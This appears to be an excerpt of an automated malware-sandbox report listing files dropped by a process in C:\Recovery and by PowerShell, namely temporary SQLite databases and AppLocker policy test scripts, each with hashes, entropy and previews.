                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\XWsircgMqo

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\Y62EZRfJOe

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\Y7Vz7WsRq8

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\ZBvhVvxMMJ

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\ZOYUvcUiHm

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\ZRTuzhPa5g

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\ZsATLBFl8Z

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05xvy3ka.ycu.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0otrdnzt.dr3.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0we4ekfu.pl4.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wwukm33.yso.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mzizgz4.dvs.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22aa1uu5.wl4.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2zlaccxt.igh.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3b0vhwfz.2yn.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4p4jacb0.lpw.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xaolzkv.kjq.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4z2m03aq.2hx.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zuobysm.g1f.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53tajh25.kwj.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xi50gcr.cz3.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ahio5nqf.4a0.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_at2o5pof.f4h.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_az2jpj3t.1xd.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b1vgz5nm.mbu.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_behscyvl.5zk.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjel2g3l.nfh.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

